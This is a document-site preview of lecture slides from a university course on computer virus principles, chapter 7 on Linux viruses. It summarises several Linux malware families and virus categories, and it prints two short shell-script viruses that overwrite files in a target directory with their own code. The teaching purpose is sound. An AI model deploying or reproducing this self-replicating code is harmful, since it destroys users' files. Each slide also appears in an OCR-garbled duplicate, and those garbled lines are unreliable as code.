当前位置：和泉文库 > 计算机 > 浏览文档

上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第七章 Linux病毒技术

本章的学习目标: 一、了解 Linux的安全问题二、掌握Linux病毒的概念三、掌握Linux下的脚本病毒四、熟悉ELF文件格式五、掌握ELF病毒感染方法

文件格式：PPT，文件大小：484.5KB，售价：17.63元

文档详细内容（约78页）

MSTREAM MST: A DDoS agent. It will open TCP port 6732 and UDP port 9325 Create master and server files ADORE.A: A internet worm. Overwrite /bin/ps. VExecutes ICMP, and opens port 65535. BIND, wu-ftpd, rpc statd, Ipd CHEESE.A: Include""shell script, ChEese perl script, and PSM ELF. Shell script GO runs perl script CHEESE. Delete all/bin/sh in /etc/inetd. conf close inetd QUASI: It will infect elF files in the current directory. It has no destructiveness PASS: It is writed by Gnu C. It will change Unix shell

• MSTREAM.MST : A DDoS agent. It will open TCP port 6732 and UDP port 9325. Create master and server files. • ADORE.A: A internet worm. Overwrite /bin/ps.VExecutes ICMP, and opens port 65535. BIND, wu-ftpd, rpc.statd, lpd. • CHEESE.A: Include "GO" shell script, CHEESE“ perl script, and “PSM” ELF.shell script GO runs perl script CHEESE. Delete all /bin/sh in /etc/inetd.conf. Close inetd. • QUASI: It will infect ELF files in the current directory. It has no destructiveness. • PASS: It is writed by GNU C. It will change Unix shell

Linux病毒分类第一种:Shel脚本病毒第二种:蠕虫病毒第三种:欺骗库函数第四种:内核级的传播第五种:与平台兼容的病毒

Virus Threats on Linux Environment Triple Linux病毒分类 • 第一种: Shell脚本病毒 • 第二种: 蠕虫病毒 • 第三种: 欺骗库函数 • 第四种: 内核级的传播 • 第五种: 与平台兼容的病毒

Linux系统下的脚本病毒 she不同的 Linux系统上面的差别很小。 Shel1单易学

Linux系统下的脚本病毒 • shell在不同的Linux系统上面的差别很小。 • Shell简单易学

第一,最原始的shel病毒 #shellvirus l#f for file in infect/k cp so Sfile done

第一，最原始的shell病毒。 • #shellvirus I# • for file in ./infect/* • do • cp $0 $file • done

第二,一个简单的Shel病毒 # shellyirusⅡ# for file in /infect/* if test -f$fie#判断是否为文件 if test-x Sfile #判断是否可执行 · if test-w$fle #判断是否有写权限 if grep- s sh Sfile>mmm#判断是否为脚本文件 cp $O Sfile #覆盖当前文件 ffff done rm mmm -f

第二，一个简单的Shell病毒 • #shellvirus II# • for file in ./infect/* • do • if test -f $file #判断是否为文件 • then • if test -x $file #判断是否可执行 • then • if test -w $file #判断是否有写权限 • then • if grep –s sh $file > .mmm #判断是否为脚本文件 • then • cp $0 $file #覆盖当前文件 • fi • fi • fi • fi • done • rm .mmm -f

点击进入文档下载页（PPT格式）

共78页，可试读20页，点击继续阅读 ↓↓

您可能感兴趣的文档

上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第一章计算机病毒概述
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（期末复习提纲）
《面向对象的分析与设计》讲义2
《面向对象的分析与设计》讲义1
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十四章软件项目管理、第十五章软件过程管理
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十三章软件维护（13.1-13.5）
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十三章软件维护、软件项目管理、软件能力成熟度模型
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十二章软件测试
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十一章软件实现
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第十章面向对象设计
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第九章面向对象分析
北京邮电大学：《软件工程模型与方法 Models & Methods of Software Engineering》课程教学资源（PPT课件讲稿）第八章面向对象基础
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第三章计算机病毒结构分析（1/2）
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第三章计算机病毒结构分析（2/2）
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第九章计算机病毒查杀方法
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第二章计算机病毒理论模型
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第五章宏病毒
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第八章移动终端恶意代码
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第六章一种特殊的病毒——特洛伊木马（Trojan horse）
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第十一章 OAV代码分析与使用配置
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第十三章计算机病毒防治策略
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第十二章杀毒软件及解决方案
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第十章计算机病毒防治技术
上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第四章计算机病毒技术特征

点击购买下载（PPT）

下载及服务说明

购买前请先查看本文档预览页，确认内容后再进行支付；
如遇文件无法下载、无法访问或其它任何问题，可发送电子邮件反馈，核实后将进行文件补发或退款等其它相关操作；
邮箱：

文档浏览记录